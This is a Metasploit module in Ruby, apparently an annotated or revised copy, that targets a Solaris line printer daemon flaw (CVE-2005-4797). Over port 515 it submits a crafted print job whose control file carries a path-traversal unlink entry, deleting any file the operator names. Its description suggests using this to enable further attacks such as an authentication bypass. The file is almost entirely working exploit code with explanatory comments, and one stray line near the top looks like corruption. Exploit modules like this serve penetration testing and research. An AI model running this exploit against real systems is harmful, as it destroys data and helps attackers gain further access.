##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
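class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Number of "../" segments prepended to RPATH so the unlink target escapes
  # the daemon's spool directory. Ten levels is ample for any Solaris spool
  # location; a few extra "../" at the filesystem root are harmless.
  TRAVERSAL_DEPTH = 10

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Solaris LPD Arbitrary File Delete',
      'Description' => %q{
        This module uses a vulnerability in the Solaris line printer
        daemon to delete arbitrary files on an affected system. This
        can be used to exploit the rpc.walld format string flaw, the
        missing krb5.conf authentication bypass, or simply delete
        system files. Tested on Solaris 2.6, 7, 8, 9, and 10.

      },
      'Author'      => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2005-4797' ],
          [ 'BID', '14510' ],
          [ 'OSVDB', '18650' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(515),
        OptString.new('RPATH', [ true, "The remote file path to delete"]),
      ])
  end

  # Submit a print job whose control file carries a 'U' (unlink) entry that
  # traverses out of the spool directory, so the daemon removes RPATH when it
  # cleans the job up. Reports progress via print_status/print_error/print_good
  # and returns nothing. The socket is always closed, including on the early
  # failure paths (the original leaked it when the job request was refused).
  def run
    rpath = datastore['RPATH'].to_s

    # RPATH is embedded verbatim into a newline-delimited control file and is
    # NUL-terminated below; either byte inside it would corrupt the file and
    # change what the daemon parses. Reject such input up front.
    if rpath.empty? || rpath.include?("\n") || rpath.include?("\x00")
      print_error("RPATH must be non-empty and must not contain newline or NUL bytes")
      return
    end

    r_hostname = Rex::Text.rand_text_alpha(rand(8) + 1)
    r_user     = Rex::Text.rand_text_alpha(rand(8) + 1)
    r_spool    = Rex::Text.rand_text_alpha(rand(8) + 1)

    # Minimal control file: originating host (H) and user (P) lines...
    control = "H#{r_hostname}\nP#{r_user}\n"

    # ...followed by the unlink (U) entry. In theory several files could be
    # deleted per job, but the lp daemon appends garbage from memory to the
    # path name unless a NUL byte follows it, and that NUL also stops the
    # parser from processing any later entries -- so one path per job.
    control << "U" + ("../" * TRAVERSAL_DEPTH) + "#{rpath}\x00\n"

    # RFC 1179 job numbers are exactly three decimal digits, so zero-pad the
    # squashed PID (the original "to_s" could yield one or two digits); the
    # hex timestamp keeps file names distinct across repeated runs.
    jid = format('%03d', $$ % 1000) + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Random data file of 1..100 alpha bytes. (The original computed
    # rand_text_alpha(100) + 1, i.e. String + Integer, which raises TypeError.)
    dataf = Rex::Text.rand_text_alpha(rand(100) + 1)

    sock1 = connect(false)
    begin
      # "Receive a printer job" (0x02). The daemon answers with a single octet;
      # zero is the positive acknowledgement, anything else is a refusal --
      # the same convention send_file relies on for the per-file commands.
      sock1.put("\x02#{r_hostname}:#{r_spool}\n")
      res = sock1.get_once
      if res.nil? || res[0] != "\0"
        print_status("The target did not accept our job request command")
        return
      end

      print_status("Deleting #{rpath}...")
      unless send_file(sock1, 2, "cfA" + jid + r_hostname, control) &&
             send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)
        return
      end

      # NOTE(review): the daemon has only acknowledged receipt of the control
      # and data files; whether the unlink actually happened is not observable
      # over this connection, so treat this message as "job accepted".
      print_good("Successfully deleted #{rpath} >:-]")
    ensure
      sock1.close
    end
  end

  # Send one sub-command of the receive-job protocol (RFC 1179 section 6):
  # type 2 = receive control file, type 3 = receive data file.
  #
  # s    - the connected socket
  # type - sub-command byte (2 or 3)
  # name - remote file name (e.g. "cfA<jid><host>")
  # data - file contents
  #
  # Sends "<type><length> <name>\n", waits for a one-byte ACK, then sends the
  # data plus the terminating NUL and waits for a second ACK. Returns true on
  # success; on failure prints which step was refused and returns nil/false.
  def send_file(s, type, name, data = '')
    # The length field must be the byte count, not the character count.
    s.put(type.chr + data.bytesize.to_s + " " + name + "\n")
    return unless ack?(s, "The target did not accept our control file command (#{name})")

    s.put(data)
    s.put("\x00")
    return unless ack?(s, "The target did not accept our control file data (#{name})")

    print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.bytesize))
    true
  end

  private

  # Read the daemon's one-byte reply; a zero byte is the ACK. Prints
  # +failure_msg+ and returns false on a missing or non-zero reply.
  def ack?(s, failure_msg)
    res = s.get_once(1)
    return true if res && res[0] == "\0"

    print_status(failure_msg)
    false
  end
end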